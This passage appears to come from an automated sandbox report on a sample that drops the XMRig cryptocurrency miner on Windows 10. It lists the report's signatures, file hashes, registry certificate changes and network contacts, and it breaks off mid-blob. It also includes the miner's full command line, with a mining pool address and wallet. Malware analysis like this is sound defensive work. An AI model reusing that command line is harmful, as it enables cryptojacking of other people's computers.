SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/3860-14-0x000001A1CF430000-0x000001A1CF450000-memory.dmp

memory/3860-15-0x000001A1CF470000-0x000001A1CF490000-memory.dmp

memory/3860-16-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-19-0x000001A1CF4B0000-0x000001A1CF4D0000-memory.dmp

memory/3860-18-0x000001A1CF490000-0x000001A1CF4B0000-memory.dmp

memory/3860-17-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-20-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-21-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-22-0x000001A1CF490000-0x000001A1CF4B0000-memory.dmp

memory/3860-23-0x000001A1CF4B0000-0x000001A1CF4D0000-memory.dmp

memory/3860-24-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-25-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-26-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-27-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-28-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-29-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-30-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-31-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-32-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-33-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-34-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-35-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-36-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-37-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-38-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-39-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-40-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-41-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-42-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-43-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-44-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-45-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-46-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-47-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-48-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-49-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-50-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-51-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-52-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-53-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-54-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-55-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-56-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-57-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-58-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-59-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-60-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-61-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-62-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-63-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-64-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-65-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-66-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-67-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-68-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-69-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-70-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-71-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-72-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-73-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-74-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-75-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-76-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-77-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-78-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-79-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-80-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-81-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

memory/3860-82-0x00007FF7EAC70000-0x00007FF7EB773000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-06-16 17:28

Reported

2024-06-17 03:42

Platform

win10v2004-20240226-en

Max time kernel

1799s

Max time network

1820s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2864 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\main.exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
PID 2864 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\main.exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

Processes

C:\Users\Admin\AppData\Local\Temp\main.exe

"C:\Users\Admin\AppData\Local\Temp\main.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3692 --field-trial-handle=2244,i,11878111470816612087,2265290141962607370,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3972 --field-trial-handle=2244,i,11878111470816612087,2265290141962607370,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
GB 216.58.201.106:443 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 11.173.189.20.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 76.234.34.23.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
BE 23.55.97.181:80 www.microsoft.com tcp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 181.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 67.32.209.4.in-addr.arpa udp
US 8.8.8.8:53 163.233.34.23.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 153.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 156.33.209.4.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 130.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 57.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 35.15.31.184.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/1272-16-0x0000021684160000-0x0000021684180000-memory.dmp

memory/1272-17-0x0000021685960000-0x0000021685980000-memory.dmp

memory/1272-18-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-19-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-21-0x0000021718120000-0x0000021718140000-memory.dmp

memory/1272-20-0x0000021718350000-0x0000021718370000-memory.dmp

memory/1272-22-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-23-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-24-0x0000021718350000-0x0000021718370000-memory.dmp

memory/1272-25-0x0000021718120000-0x0000021718140000-memory.dmp

memory/1272-26-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-27-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-28-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-29-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-30-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-31-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-32-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-33-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-34-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-35-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-36-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-37-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-38-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-39-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-40-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-41-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-42-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-43-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-44-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-45-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-46-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-47-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-48-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-49-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-50-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-51-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-52-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-53-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-54-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-55-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-56-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-57-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-58-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-59-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-60-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-61-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-62-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-63-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-64-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-65-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-66-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-67-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-68-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-69-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-70-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-71-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-72-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-73-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-74-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-75-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-76-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-77-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-78-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-79-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-80-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-81-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-82-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-83-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

memory/1272-84-0x00007FF6961C0000-0x00007FF696CC3000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted

2024-06-16 17:28

Reported

2024-06-17 03:39

Platform

win10v2004-20240611-en

Max time kernel

1794s

Max time network

1786s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e637